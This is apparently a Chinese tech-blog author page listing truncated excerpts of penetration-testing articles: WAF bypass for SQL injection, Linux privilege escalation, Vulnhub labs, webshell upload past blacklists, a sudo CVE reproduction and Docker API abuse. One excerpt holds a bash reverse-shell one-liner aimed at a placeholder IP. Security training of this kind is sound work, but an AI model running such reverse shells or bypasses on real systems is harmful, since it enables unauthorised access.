logo
publist
写文章

简介

该用户还未填写简介

擅长的技术栈

可提供的服务

暂无可提供的服务

Bypass 360主机卫士SQL注入防御(多姿势)

0x00 前言在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前测试的虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御。  0x01 环境搭建360主机卫士官网:http://zhuji....

实战Linux下三种不同方式的提权技巧

在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到  获取到低权限SHELL后我们通常做下...

Kali无法连接,SSH服务器拒绝了密码,xshell连不上虚拟机怎么办

SSH服务器拒绝了密码,xshell连不上虚拟机怎么办应该是sshd的设置不允许root用户用密码远程登录 修改 vi /etc/ssh/sshd_config 找到# Authentication: LoginGraceTime 120 PermitRootLogin without passwd StrictModes yes 改成Authentication:Logi...

【Vulnhub系列】Billu_b0x

简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/信息收...

文章图片
#网络安全
安装DVWA渗透环境到CentOS7系统中(附百度云ova镜像下载)

这个本身我已经安装好了,然后这里有现成的环境ova格式,直接用虚拟机打开然后设置网卡为桥接模式就行了密码:e6k7原文地址:http://blog.csdn.net/isinstance/article/details/54090936方法呢还是记录一下:1.肯定是安装虚拟机嘛这个就不多说了,安装一个centos7最小模式就行然后配置sshyum install o...

某些环境下绕过php后缀黑名单上传webshell

某期三个白帽,某牛的出的题被秒,他利用过滤黑名单的方式防止上传。做题的人就是直接上传phtml绕过黑名单的,但是我之前还不知道phtml还被能解析成php。于是我本地测试,却发现我本地的phtml后缀解析不了。我本地的环境phpstudy集成环境。我然后又在我的kali虚拟机里面测试,发现可以解析phtml。当时感觉好奇怪于是我就翻了翻了我kali里面的apache配置文件kali是d...

(CVE-2021-3156)Linux sudo权限提升漏洞 复现

漏洞概述1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地

#网络安全
Web渗透中的反弹Shell与端口转发的奇淫技巧

奇淫技巧0x00 前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01 反弹shell1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口 bash -i >& /dev/tcp/x.x.x.x/2333 0&g..

[Kali Linux 安全渗透教程新手版]

1.1什么是安全渗透渗透测试时通过模拟黑客的攻击方法,来评估计算机网络系统安全的一种评估方法.通常的评估方式对评估结果更具全面性,而渗透测试更注重安全露的严重性.1.6Kali更新与升级Ctrl+F1  快捷键提示Ctrl+Alt+F1(F2)   Kali图形模式Ctrl+Alt+F3 (F4 F5 F6 F7) Kali文本模式"root

Docker Remote api在安全中的应用杂谈

注:本文为“小米安全中心”原创,作者: netxfly  ,转载请联系“小米安全中心”概述众所周知,Docker daemon默认是监听在unix socket上的,如unix:///var/run/docker.sock。官方还提供一个Rustful api接口,允许通过TCP远程访问Docker,例如执行以下启动参数可以让docker监听在本地所有地址的2375端口上:doc...

    共 27 条
  • 1
  • 2
  • 3
  • 请选择